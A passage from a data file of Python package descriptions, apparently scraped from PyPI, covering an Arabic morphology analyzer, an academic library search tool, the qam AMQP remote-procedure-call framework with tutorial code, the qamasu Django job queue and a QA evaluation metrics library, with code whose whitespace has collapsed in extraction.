pos...lemmas=lemmer.lemmatize_text(text,return_pos=True)>>>print(lemmas)[('\u0647\u0644','stopword'),('\u0627\u062d\u062a\u0627\u062c','verb'),('\u0625\u0644\u0649','stopword'),('\u062a\u0631\u062c\u0645\u0629','noun'),('\u0643\u064a','stopword'),('\u062a\u0641\u0647\u0645','noun'),('\u062e\u0637\u0627\u0628','noun'),('\u0645\u0644\u0643','noun'),'\u061f',('\u0644\u063a\u0629','noun'),'\"',('\u0643\u0644\u0627\u0633\u064a\u0643\u064a','noun'),'\"(',('\u0641\u0635\u062d\u0649','noun'),')',('\u0645\u0648\u062c\u0648\u062f','noun'),('\u0641\u064a','stopword'),('\u0643\u0644','stopword'),('\u0644\u063a\u0629','noun'),('\u0630\u0644\u0643','stopword'),('\u0644\u063a\u0629','noun'),'\"',('\u062f\u0627\u0631\u062c','noun'),'\"..',('\u0641\u0631\u0646\u0633\u064a','noun'),('\u0627\u0644\u062a\u064a','stopword'),('\u062f\u0631\u0633','verb'),('\u0641\u064a','stopword'),('\u0645\u062f\u0631\u0633\u0629','noun'),('\u0644\u064a\u0633\u062a','stopword'),('\u0641\u0631\u0646\u0633\u064a','noun'),('\u0627\u0644\u062a\u064a','stopword'),('\u0627\u0633\u062a\u062e\u062f\u0645','verb'),('\u0646\u0627\u0633','noun'),('\u0641\u064a','stopword'),('\u0634\u0648\u0627\u0631\u0639','noun'),('\u0628\u0627\u0631\u064a\u0633','all'),'..',('\u0645\u0644\u0643','noun'),('\u0628\u0631\u064a\u0637\u0627\u0646\u064a\u0627','noun'),('\u0644\u0627','stopword'),('\u062e\u0637\u0628','verb'),('\u0628\u0644\u063a\u0629','noun'),('\u0634\u0648\u0627\u0631\u0639','noun'),('\u062f\u0646\u0648','verb'),'..',('\u0643\u0644','stopword'),('\u0645\u0642\u0627\u0645','noun'),('\u0645\u0642\u0627\u0644\u064a','noun')]>>># Get vocalized output lemmas>>>lemmer.set_vocalized_lemma()>>>lemmas=lemmer.lemmatize_text(text)>>>print(lemmas)['\u0647\u064e\u0644\u0652','\u0627\u0650\u062d\u0652\u062a\u064e\u0627\u062c\u064e','\u0625\u0650\u0644\u064e\u0649','\u062a\u064e\u0631\u0652\u062c\u064e\u0645\u064e\u0629\u064c','\u0643\u064e\u064a\u0652','\u062a\u064e\u0641\u064e\u0647\u0651\u064f\u0645\u064c','\u062e\u064e\u0637\u0651\u064e\u0627\u0628\u064c','\u0645\u064e\u0644\u064e\u0643\u064c','\u061f','\u0644\u064f\u063a\u064e\u0629\u064c','\"','\u0643\u0650\u0644\u0627\u064e\u0633\u0650\u064a\u0643\u0650\u064a\u0651\u064c','\"(','\u0641\u064f\u0635\u0652\u062d\u064e\u0649',')','\u0645\u064e\u0648\u0652\u062c\u064f\u0648\u062f\u064c','\u0641\u0650\u064a','\u0643\u064f\u0644\u0651\u064e','\u0644\u064f\u063a\u064e\u0629\u064c','\u0630\u064e\u0644\u0650\u0643\u064e','\u0644\u064f\u063a\u064e\u0629\u064c','\"','\u062f\u064e\u0627\u0631\u0650\u062c\u064c','\"..','\u0641\u064e\u0631\u064e\u0646\u0652\u0633\u0650\u064a\u0651','\u0627\u0644\u0651\u064e\u062a\u0650\u064a','\u062f\u064e\u0631\u064e\u0633\u064e','\u0641\u0650\u064a','\u0645\u064e\u062f\u0652\u0631\u064e\u0633\u064e\u0629\u064c','\u0644\u064e\u064a\u0652\u0633\u064e\u062a\u0652','\u0641\u064e\u0631\u064e\u0646\u0652\u0633\u0650\u064a\u0651','\u0627\u0644\u0651\u064e\u062a\u0650\u064a','\u0627\u0650\u0633\u0652\u062a\u064e\u062e\u0652\u062f\u064e\u0645\u064e','\u0646\u064e\u0627\u0633\u064c','\u0641\u0650\u064a','\u0634\u064e\u0648\u064e\u0627\u0631\u0650\u0639\u064c','\u0628\u0627\u0631\u064a\u0633','..','\u0645\u064e\u0644\u064e\u0643\u064c','\u0628\u0631\u0650\u064a\u0637\u0627\u0646\u0650\u064a\u0627','\u0644\u064e\u0627','\u062e\u064e\u0637\u064e\u0628\u064e','\u0628\u064e\u0644\u064e\u063a\u064e\u0629\u064c','\u0634\u064e\u0648\u064e\u0627\u0631\u0650\u0639\u064c','\u0623\u064e\u062f\u064e\u0627\u0646\u064e','..','\u0643\u064f\u0644\u0651\u064e','\u0645\u064e\u0642\u064e\u0627\u0645\u064c','\u0645\u064e\u0642\u064e\u0627\u0644\u064c']>>>Morphology analysisfilename=\"samples/text.txt\"importqalsadi.analexasqatry:myfile=open(filename)text=(myfile.read()).decode('utf8');iftext==None:text=u\"\u0627\u0644\u0633\u0644\u0627\u0645 \u0639\u0644\u064a\u0643\u0645\"except:text=u\"\u0623\u0633\u0644\u0645\"print\" given text\"debug=False;limit=500analyzer=qa.Analex()analyzer.set_debug(debug);result=analyzer.check_text(text);print'----------------python format result-------'printresultforiinrange(len(result)):# print \"--------\u062a\u062d\u0644\u064a\u0644 \u0643\u0644\u0645\u0629 ------------\", word.encode('utf8');print\"-------------One word detailed case------\";foranalyzedinresult[i]:print\"-------------one case for word------\";printrepr(analyzed);Output descriptionCategoryApplied onfeatureexample a\u0634\u0631\u062daffixallaffix_key\u0627\u0644--\u064e\u0627\u062a\u064f- a\u0645\u0641\u062a\u0627\u062d \u0627\u0644\u0632\u0648\u0627\u0626\u062faffixallaffixa\u0627\u0644\u0632\u0648\u0627\u0626\u062finputallword\u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a a\u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0645\u062f\u062e\u0644\u0629inputallunvocalizeda\u063a\u064a\u0631 \u0645\u0634\u0643\u0648\u0644morphologynountag_mamnou30 a\u0645\u0645\u0646\u0648\u0639 \u0645\u0646 \u0627\u0644\u0635\u0631\u0641morphologyverbtag_confirmed0 a\u062e\u0627\u0635\u064a\u0629 \u0627\u0644\u0641\u0639\u0644 \u0627\u0644\u0645\u0624\u0643\u062fmorphologyverbtag_mood0 a\u062d\u0627\u0644\u0629 \u0627\u0644\u0641\u0639\u0644 \u0627\u0644\u0645\u0636\u0627\u0631\u0639 (\u0645\u0646\u0635\u0648\u0628\u060c \u0645\u062c\u0632\u0648\u0645\u060c \u0645\u0631\u0641\u0648\u0639)morphologyverbtag_pronoun0 a\u0627\u0644\u0636\u0645\u064a\u0631morphologyverbtag_transitive0 a\u0627\u0644\u062a\u0639\u062f\u064a \u0627\u0644\u0644\u0632\u0648\u0645morphologyverbtag_voice0 a\u0627\u0644\u0628\u0646\u0627\u0621 \u0644\u0644\u0645\u0639\u0644\u0648\u0645/ \u0627\u0644\u0628\u0646\u0627\u0621 \u0644\u0644\u0645\u062c\u0647\u0648\u0644morphologynountag_regular1 a\u0642\u064a\u0627\u0633\u064a/ \u0633\u0645\u0627\u0639\u064amorphologynoun/verbtag_gender3 a\u0627\u0644\u0646\u0648\u0639 ( \u0645\u0624\u0646\u062b \u0645\u0630\u0643\u0631)morphologyverbtag_person4 a\u0627\u0644\u0634\u062e\u0635 (\u0627\u0644\u0645\u062a\u0643\u0644\u0645 \u0627\u0644\u063a\u0627\u0626\u0628 \u0627\u0644\u0645\u062e\u0627\u0637\u0628)morphologynountag_number21 a\u0627\u0644\u0639\u062f\u062f(\u0641\u0631\u062f/\u0645\u062b\u0646\u0649/\u062c\u0645\u0639)originalnoun/verbfreq694644 a\u062f\u0631\u062c\u0629 \u0634\u064a\u0648\u0639 \u0627\u0644\u0643\u0644\u0645\u0629originalalloriginal_tags(u a\u062e\u0635\u0627\u0626\u0635 \u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629originalalloriginal\u0628\u064e\u064a\u064e\u0627\u0646\u064c a\u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629originalallroot\u0628\u064a\u0646 a\u0627\u0644\u062c\u0630\u0631originalalltag_original_gender\u0645\u0630\u0643\u0631 a\u062c\u0646\u0633 \u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629originalnountag_original_number\u0645\u0641\u0631\u062f a\u0639\u062f\u062f \u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629outputalltypeNoun:\u0645\u0635\u062f\u0631 a\u0646\u0648\u0639 \u0627\u0644\u0643\u0644\u0645\u0629outputallsemivocalized\u0627\u0644\u0652\u0628\u064e\u064a\u064e\u0627\u0646\u064e\u0627\u062a a\u0627\u0644\u0643\u0644\u0645\u0629 \u0645\u0634\u0643\u0648\u0644\u0629 \u0628\u062f\u0648\u0646 \u0639\u0644\u0627\u0645\u0629 \u0627\u0644\u0625\u0639\u0631\u0627\u0628outputallvocalized\u0627\u0644\u0652\u0628\u064e\u064a\u064e\u0627\u0646\u064e\u0627\u062a\u064f a\u0627\u0644\u0643\u0644\u0645\u0629\u0645\u0634\u0643\u0648\u0644\u0629outputallstem\u0628\u064a\u0627\u0646 a\u0627\u0644\u062c\u0630\u0639syntaxalltag_break0 a\u0627\u0644\u0643\u0644\u0645\u0629 \u0645\u0646\u0641\u0635\u0644\u0629 \u0639\u0645\u0651\u0627 \u0642\u0628\u0644\u0647\u0627syntaxalltag_initial0 a\u062e\u0627\u0635\u064a\u0629 \u0646\u062d\u0648\u064a\u0629\u060c \u0627\u0644\u0643\u0644\u0645\u0629 \u0641\u064a \u0628\u062f\u0627\u064a\u0629 \u0627\u0644\u062c\u0645\u0644\u0629syntaxalltag_transparent0 a\u0627\u0644\u0628\u062f\u0644syntaxnountag_added0 a\u062e\u0627\u0635\u064a\u0629 \u0646\u062d\u0648\u064a\u0629\u060c \u0627\u0644\u0643\u0644\u0645\u0629 \u0645\u0636\u0627\u0641syntaxallneeda\u0627\u0644\u0643\u0644\u0645\u0629 \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0643\u0644\u0645\u0629 \u0623\u062e\u0631\u0649 (\u0627\u0644\u0645\u062a\u0639\u062f\u064a\u060c \u0627\u0644\u0639\u0648\u0627\u0645\u0644) \u063a\u064a\u0631 \u0645\u0646\u062c\u0632\u0629syntaxtoolactiona\u0627\u0644\u0639\u0645\u0644syntaxtoolobject_typea\u0646\u0648\u0639 \u0627\u0644\u0645\u0639\u0645\u0648\u0644\u060c \u0628\u0627\u0644\u0646\u0633\u0628\u0629 \u0644\u0644\u0639\u0627\u0645\u0644\u060c \u0645\u062b\u0644\u0627 \u0627\u0633\u0645 \u0644\u062d\u0631\u0641 \u0627\u0644\u062c\u0631Unsing CacheQalsadi can use Cache to speed up the process, there are 4 kinds of cache,Memory cachePickle cachePickledb cacheCodernityDB cache.To use one of it, you can see the followng examples:Using a factory method>>>importqalsadi.analex>>>fromqalsadi.cache_factoryimportCache_Factory>>>analyzer=qalsadi.analex.Analex()>>># list available cache names>>>Cache_Factory.list()['','memory','pickle','pickledb','codernity']>>># configure cacher>>># configure path used to store the cache>>>path='cache/qalsasicache.pickledb'>>>cacher=Cache_Factory.factory(\"pickledb\",path)>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()Memory cache>>>importqalsadi.analex>>>analyzer=qalsadi.analex.Analex()>>># configure cacher>>>importqalsadi.cache>>>cacher=qalsadi.cache.Cache()>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()>>># to disable the use of cacher>>>analyzer.disable_allow_cache_use()Pickle cache>>>importqalsadi.analex>>>fromqalsadi.cache_pickleimportCache>>>analyzer=qalsadi.analex.Analex()>>># configure cacher>>># configure path used to store the cache>>>path='cache/qalsadiCache.pickle'>>>cacher=Cache(path)>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()Pickledb cache>>>importqalsadi.analex>>>fromqalsadi.cache_pickledbimportCache>>>analyzer=qalsadi.analex.Analex()>>># configure cacher>>># configure path used to store the cache>>>path='cache/qalsadiCache.pickledb'>>>cacher=Cache(path)>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()CodernityDB cache>>>importqalsadi.analex>>>fromqalsadi.cache_codernityimportCache>>>analyzer=qalsadi.analex.Analex()>>># configure cacher>>># configure path used to store the cache>>>path='cache'>>>cacher=Cache(path)>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()"} +{"package": "qal-swflint", "pacakge-description": "Query Academic LibraryThis application is built to support automatically searching a number of academic digital libraries. In particular, it currently supports the following:IEEE XploreSpringerLinkScienceDirectToolsqal-queryThis tool can be used to try queries out on different digital libraries, as well as discover information about the capabilities and query options of each individual library. Options of note include:-Lor--list-libraries: This option will list all libraries known to the system and their abbreviations.-dor--describe: When coupled with-l, describe a library, showing the query option names available and their descriptions.-lor--library: Select a library to query or describe.-ror--results: Select where to store results.-qor--query: Multiple allowed, should be of the formquery-option-name=value.qal-autoThis tool is used to automatically run several queries against supported digital libraries. There are several options, including:-por--plan-file: The location of the plan file. Format described below.-sor--status-file: Where to store query status (allows for picking back up if interrupted).-oor--output-file: Where to store the results data.-bor--number-batches: How many batches to run (how many times through one page of each query/provider pair).-vor--verbose: Can show multiple times, more times is more verbose.Plan FilesThe plan file is a JSON-formatted dictionary, with at least the two following keys.sites: an array of dictionaries. Each dictionary contains minimum aname, and should contain akey, and can also containstartandpage_sizekeys (integer values), and an optionaloptionskey with a dictionary of options. See documentation for particular APIs.queries: an array of dictionaries. These dictionaries map query options (symbolic names, seeqal-query --describe -l libraryfor options) to string values.Obtaining API KeysConfer with your institution & institutional library before doing so, however, it's fairly easy to obtain keys.For IEEE Xplore:register here. Place the API Key inIEEE_XPLORE_API_KEY.For SpringerLink:register here. Place the API Key inSPRINGER_LINK_API_KEY.For ScienceDirect:register here. Place the API Key inSCIENCE_DIRECT_API_KEY.Notes on Particular BackendsSpringerLinkThis must be accessed from your institutional IP address allocations. Springer uses the requester IP as part of the authentication process. Currently, their API does not give JSON-formatted responses on error: in this case, execution is stopped.ScienceDirectThis must also be accessed from your institutional IP address allocations. Elsevier will limit results based on your institutions subscriptions (as far as I can tell, at least). They handle quite well reporting of errors. If you ever get an error message that is not handled, please make an issue."} +{"package": "qalx-orcaflex", "pacakge-description": "qalx-orcaflexTools to help you run OrcaFlex onqalx.To use this package you'll need aqalxAPI key.\nThis can be obtained by registering atqalx.net.FeaturesThe current features are:Batches: build batches of OrcaFlex data files from various sourcesResults: attach some required results which will be extracted automatically when the simulation is complete. The results will also be summarised for each batchLoad case information: results in a batch can be linked to information about the load caseModel views: define a set of model views that will be automatically captured at the end of the simulationSmart statics: allows you to add object tags that will be used to iteratively find a model that solves in staticsSome planned features:Custom results specificationLinked Statistics and Extreme StatisticsModel views at key result points (e.g. max of a time history)Model video extractionOptional progress screenshotsAutomatic batch cancellation on result breachAllowed to define \u201cModel deltas\u201d from a base modelOption to extract all model data into qalx (useful if you want to do analytics/ML on model/sim data over time)Installationpipinstallqalx-orcaflexDocumentationThis can be found here.Questions?Pleasesend us an email (info@qalx.net)!"} +{"package": "qam", "pacakge-description": "Introductionqamis a framework for remote-procedure-calls. It uses thecarrotmessaging framework. The RPC specific code is based onPython XML-RPC.Noteqamis not actively maintened anymore by the qamteam. The successor ofqamiscallme.callmeuses internally a more simpler approach asqamdue to the improvements the AMQP standard has made since QAM was released. Therefore we made a complete re-design and wrotecallmewhich has less overhead and is much faster thanqam.Key Features:uses AMQP as Transport Protocolsupports synchronous and asynchrouns remote method callssupports timeouts in synchronous and asynchronous modeJSON marshaling for high interoperatbility (seeSerialization: JSON vs. Picklefor details)Pickle marshaling for Object Transport SupportSupports Remote Exception Transfer in JSON/Pickle/Synchronous/Asynchrounus modeFully ThreadedEasy to UseOpenSource BSD-licensedThe AMQP messaging system manages the remote-procedure-calls for a client and a server. The client sends a amqp message to the server, where the method is specified which should be called on server.\nAfter executing the function the result is packed into a amqp message and sent back to the client.The aim ofqamis to offer a simple RPC framework, which is reliable and secure.You have to install a AMQP message broker. The most popular are:RabbitMQZeroMQApache ActiveMQPersonally we have used RabbitMQ, it is easy to install and to configure.Before you start using theqamframework you should know a little bit about AMQP.\nTherefor we advice you to readRabbits and warrensa very good article which introduces the basic ideas of AMQP.\nFurther you can look at thecarrotdocumentation. There you can get also good overview of AMQP.DocumentationThe full Documentation including Reference can be found atpypi documentationMailing listJoin the QAM Users mailing list:QAM-UsersIf you are developing inside QAM join:QAM-DevelopersBug Tracker:If you find any issues please report them onhttp://bitbucket.org/qamteam/qam/issues/Getting QAMYou can get the python package on thePython Package IndexThe Mercurial Repository is available atbitbucket.org qamInstallationqamcan be installed via the Python Package Index of from source.Usingeasy_installto installqam:$ easy_install qamIf you have downloaded a source tarball you can install it\nby doing the following:$ python setup.py build\n# python setup.py install # as rootTutorialStarting the QAMServerFirst it is necessary, to tell the QAMServer which functions are available. Therefore you have to register the functions on the QAMServer.\nAfter registering the functions, the QAMServer waits for method-calls from the QAMProxy.Here is how you register a function on QAMServer and switch into the serving mode:>>> from qam.qam_server import QAMServer\n>>> qam_server = QAMServer(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver')\n...\n>>> def adder_function(x, y):\n... return x + y\n...\n>>> qam_server.register_function(adder_function, 'add')\n...\n... # it is also possible to register the adder_function as follows:\n... # qam_server.register_function(adder_function)\n... # the method-name for registering in this case is adder_function.__name__\n...\n>>> qam_server.serve()It is also possible to register whole classes on QAMServer. Therefore you only have to register the class instance on the QAMServer.\nIt\u2019s not necessary to register all functions of the class, it\u2019s enough when you register the class instance.IMPORTANT:When you register an instance you must specify a name as second argument in theregister_class()method which selects the instance when calling it.\nIn the example below you would call the remote methodproxy.my_instance.adder_function(1,2)Here is how you register a class instance on QAMServer and switch into the serving mode:>>> from qam.qam_server import QAMServer\n>>> qam_server = QAMServer(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver')\n...\n>>> class TestClass():\n... def __init__(self):\n... pass\n... def adder_function(self,a,b):\n... return a+b\n...\n>>> instance = TestClass()\n>>> qam_server.register_class(instance,'my_instance')\n>>> qam_server.serve()Managing RPC with QAMProxyThe QAMProxy sends the RPC-requests to the QAMServer and receives the result. It acts like a client which can call Server Methods and receive their\nresults.There are two different ways to receive the result:synchronous call: the QAMProxy blocks until a result arrivesasynchronous call: it is possible to register a callback-function which will be called when the result arrives.\nIn the meantime the QAMProxy can execute other functions or you can go in with your programm to execute.Synchronous RPCThis example shows you how to call a simple method registered on the QAMServer. You have to wait for the result, because no callback-function is registered. So it is a synchronous RPC.>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException\n... # create a new QAMProxy-instance\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n>>> result = qam_proxy.add(2,3) # call method on QAMServer and wait for a result\n... # close all open AMQP connections and cleanup\n>>> qam_proxy.close()In case you have registered a class instance on the QAMServer and you want to call a method from this instance you can simple call this instance on QAMProxy.\nYou can call the instance with the name you specified withqam.qam_server.QAMServer.register_class(instance,name).\nIn this example it is a synchronous RPC again. You have to wait for the result.>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n>>> result = qam_proxy.my_instance.adder_function(2,4)\n>>> qam_proxy.close()Asynchronous RPCIf you don\u2019t want to wait for the result it is possible to register a callback-function.\nYou can do this by callingQAMProxy.callback(callback_function,error_function).method_to_call_on_server(params).\nThe callback-function takes two parameters as arguments. The first is the callback-function.\nThe second is optional and is only called if an error occourd on QAMServer.SIDENOTE:It is highly recomended that you alway set a error_function as well, as\nyou can never know if the remote method will succeed or will throw an exception or if an internal exception will happen. Especially in asynchronous\ncalls the only way you will be notified in case of an error WITHOUT an error_function is the qam logging.After receiving the result from QAMServer the callback-function or the error-function is executed, with the result as parameter.\nYou can monitor the state of the callback withqam.qam_proxy.get_callback_state(uid). Possible States are:0: waiting on result1: processing (result arrived and callback/error function is currently executing)2: callback finished (callback/error function have finished executing)In the following example you can see how to use callback-functions. In this example a simple method-call on the Server should be executed.\nNo class instance is registered on the QAMServer, only the adder_function is registered.>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n... # defining functions for callback\n>>> def success(arg):\n... print arg\n>>> def error(arg):\n... # if an error occours on QAMServer\n... print arg\n>>> uid = qam_proxy.callback(success, error).add(2,4)\n>>> while True:\n... state = qam_proxy.get_callback_state(uid)\n... if state == 2 :\n... # execution of callback finished\n... break\n...\n>>> qam_proxy.close()The function success and error are registered as callback and error function. If everything succeeds the success-function will be called.\nIf an error occoured on the QAMServer the error-function will be called.\nIf no error-function is defined and an error occourd a log-message is written into the logging system.It is also possible to execute asynchronous class-instance-method calls on the QAMServer. In the following example you can see how you can manage that.\nYou can call the instance with the name you specified withqam.qam_server.QAMServer.register_class(instance,name).>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n... # defining functions for callback\n>>> def success(arg):\n... print arg\n>>> def error(arg):\n... # if an error occours on QAMServer\n... print arg\n>>> uid = qam_proxy.callback(success, error).my_instance.adder_function(2,4)\n>>> while True:\n... state = qam_proxy.get_callback_state(uid)\n... if state == 2 :\n... # execution of callback finished\n... break\n...\n>>> qam_proxy.close()TimeoutsIt is also possible to set timeouts for remote functions. E.g. you might use timeouts if you don\u2019t want to wait longer than for example 10 seconds\nfor a function to return because after 10 seconds the result isn\u2019t important for you anymore.A simple client side synchronous code would look like this:>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException, QAMTimeoutException\n... # create a new QAMProxy-instance\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n>>> try:\n>>> result = qam_proxy.set_timeout(10).add(2,3) # call method on QAMServer and wait for a result\n>>> except QAMTimeoutException:\n>>> print 'Remote function is too slow, timeout occoured.'\n...# close all open AMQP connections and cleanup\n>>> qam_proxy.close()But we also can set timeouts in asynchronous mode. The Callback/Error function will then only get called if it gets executed before the\ntimeout occours. If the timeout occours before the callback/error function gets executed, the error function gets called with aqam.qam_proxy.QAMTimeoutExceptionas argument. Let\u2019s have a look at some sample code, again we assume that after 10 seconds result is\nnot anymore important to us.A simple client side asynchronous code would look like this:>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException, QAMTimeoutException\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n... # defining functions for callback\n>>> def success(arg):\n... print arg\n>>> def error(arg):\n... if isinstance(arg, QAMTimeoutException):\n... #timeout occoured\n... print 'Timeout occoured'\n... else:\n... print 'Other error happened'\n>>> uid = qam_proxy.callback(success, error).set_timeout(10).add(2,4)\n>>> while True:\n... state = qam_proxy.get_callback_state(uid)\n... if state == 2 :\n... # execution of callback finished\n... break\n...\n>>> qam_proxy.close()Internally, if an timeout occours it doesn\u2019t matter if the actual function will return some day or if it will never return.\nIn case the remote function returns after the timeout exception has occoured the message will be correctly processed (so that everything stays\nclean in the AMQP Subsystem) but the result will be thrown away.Serialization: JSON vs. PickleWhen working with QAM all the remote methods and results will get serialized in the background for you that you don\u2019t have to bother about that.\nBut for flexibility you can choose between two serializer: JSON and Pickle. Both have their benefits and drawbacks. In most cases you will do fine\nwith the default Pickle serializer. But if you have special requirements you might choose the JSON serializer.IMPORTANT: Anyway which serializer you choose, you must specify the same serializer on the QAMServer and on the QAMProxy, otherwise\nthey can\u2019t communicate correctly.SIDENOTE:The default serializer isPickle.To set the serializer on the proxy, here e.g. json:>>> from qam.qam_proxy import QAMProxy\n... # create a new QAMProxy-instance\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... serializer='json')To set the serializer on the server, again json:>>> from qam.qam_server import QAMServer\n>>> qam_server = QAMServer(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... serializer='json')To get an slight overview which serializer fits your need best here is a small comparison.\nThis comparision is specially trimmed for the use in QAM. In other environments there might be other things to be aware of.PropertyPickleJSONCompressiongoodno compressionComplex Object Transportyesonly json encodable\nobjects are supported\n(dict, list, scalar)Support for Custom Exception Inheritanceyesno, but you can use\nExceptions as well. The\nonly drawback is that you\ncannot create custom Exceptions\nwith inheritanceInteroperability with other languagesworsegood, as our transport format\nis quite easy to implement in\nother languages with json supportNeeds Complex Type Definitions on\nboth sides (Proxy and Server)yes, because proxy and\nthe server need to know\nwhich type they will get.\nYou have to import your\ncustom Argument Classes or\ncustom Exceptions you want\nto raise on both proxy side\nand server side.no, because we can only transfer dict\nlist, and scalars we don\u2019t need to\ndefine them seperately.ArchitectureSupported byWingware - The Python IDE (http://wingware.com)ContributingWe are welcome everyone who wants to contribute to QAM. Development of QAM happens athttp://bitbucket.org/qamteam/qam/LicenseQAM is released under the BSD License. The full license text is in the root folder of the QAM Package."} +{"package": "qama-distr", "pacakge-description": "No description available on PyPI."} +{"package": "qamanage", "pacakge-description": "Public Script Library of quality management department"} +{"package": "qamasu", "pacakge-description": "Qamasu is JobQueue system that respects TheSchwartz.Suited to load leveling.Implemented using optimistic lock.RequirementsPython>=2.6Django>=1.0Python3 needs Django1.5UsageSet Qamasu up!Qamasu is a Django application.You need add qamasu to your or new django project\u2019s INSTALLED_APPS.And //manage.py syncdb//.Write your worker.DefineGRAB_FORin seconds that is max time worker grabbed for a work.Definedef work_safely(manager, job):that is a work you need.Seesample workerin workers directory for detail.RegistrationYou need add worker to abilities.register_func insert fuction record into database table if not exist.>>> from qamasu import Qamasu\n>>> qamasu = Qamasu([])\n>>> qamasu.register_func('workers.random_wait')Queue!Once fuction is registered to qamasu, you can enqueue jobs.Add hundreds Queues.:>>> from qamasu import Qamasu\n>>> from random import uniform\n>>> qamasu = Qamasu(['workers.random_wait',])\n>>> for x in xrange(1,500):\n arg = dict(random_number=uniform(1,5))\n qamasu.enqueue('workers.random_wait', arg)Add a highest-priority queue.:>>> qamasu.enqueue('workers.random_wait', dict(random_number=uniform(1,5)), priority=1)Work! Work! Work!Process enqueued job.Instantiate Qamasu with availabilities.call work method. infinite loop inside this method.work method process queue as FIFO.>>> from qamasu import Qamasu\n>>> qamasu = Qamasu(['workers.random_wait',])\n>>> qamasu.work()Use work_prioritizing method if you tend to process job respects to priority.>>> from qamasu import Qamasu\n>>> qamasu = Qamasu(['workers.random_wait',])\n>>> qamasu.work_prioritizing()Caution!For MySQL backendYou must set worker\u2019s transaction isolation level to read commited before working qamasu when you use InnoDB.>>> from django.db import connection\n>>> from qamasu import Qamasu\n>>> connection.cursor().execute('set session transaction isolation level read committed')\n>>> qamasu = Qamasu(['workers.random_wait',])\n>>> qamasu.work()Or you have to set transaction isolation level read committed. It\u2019s global settings and dangerous.[mysqld]\ntransaction-isolation=Read-Committed"} +{"package": "qa-metrics", "pacakge-description": "QA-Evaluation-MetricsQA-Evaluation-Metrics is a fast and lightweight Python package for evaluating question-answering models. It provides various basic metrics to assess the performance of QA models. Check out our paperPANDA, an efficient QA evaluation that retains competitive evaluation performance of transformer LLM models.InstallationTo install the package, run the following command:pipinstallqa-metricsUsageThe python package currently provides four QA evaluation metrics.Exact Matchfromqa_metrics.emimportem_matchreference_answer=[\"The Frog Prince\",\"The Princess and the Frog\"]candidate_answer=\"The movie\\\"The Princess and the Frog\\\"is loosely based off the Brother Grimm's\\\"Iron Henry\\\"\"match_result=em_match(reference_answer,candidate_answer)print(\"Exact Match: \",match_result)'''Exact Match: False'''F1 Scorefromqa_metrics.f1importf1_match,f1_score_with_precision_recallf1_stats=f1_score_with_precision_recall(reference_answer[0],candidate_answer)print(\"F1 stats: \",f1_stats)'''F1 stats: {'f1': 0.25, 'precision': 0.6666666666666666, 'recall': 0.15384615384615385}'''match_result=f1_match(reference_answer,candidate_answer,threshold=0.5)print(\"F1 Match: \",match_result)'''F1 Match: False'''PANDA Matchfromqa_metrics.pedantimportPEDANTquestion=\"Which movie is loosley based off the Brother Grimm's Iron Henry?\"pedant=PEDANT()scores=pedant.get_scores(reference_answer,candidate_answer,question)max_pair,highest_scores=pedant.get_highest_score(reference_answer,candidate_answer,question)match_result=pedant.evaluate(reference_answer,candidate_answer,question)print(\"Max Pair:%s; Highest Score:%s\"%(max_pair,highest_scores))print(\"Score:%s; PANDA Match:%s\"%(scores,match_result))'''Max Pair: ('the princess and the frog', 'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"'); Highest Score: 0.854451712151719Score: {'the frog prince': {'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"': 0.7131625951317375}, 'the princess and the frog': {'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"': 0.854451712151719}}; PANDA Match: 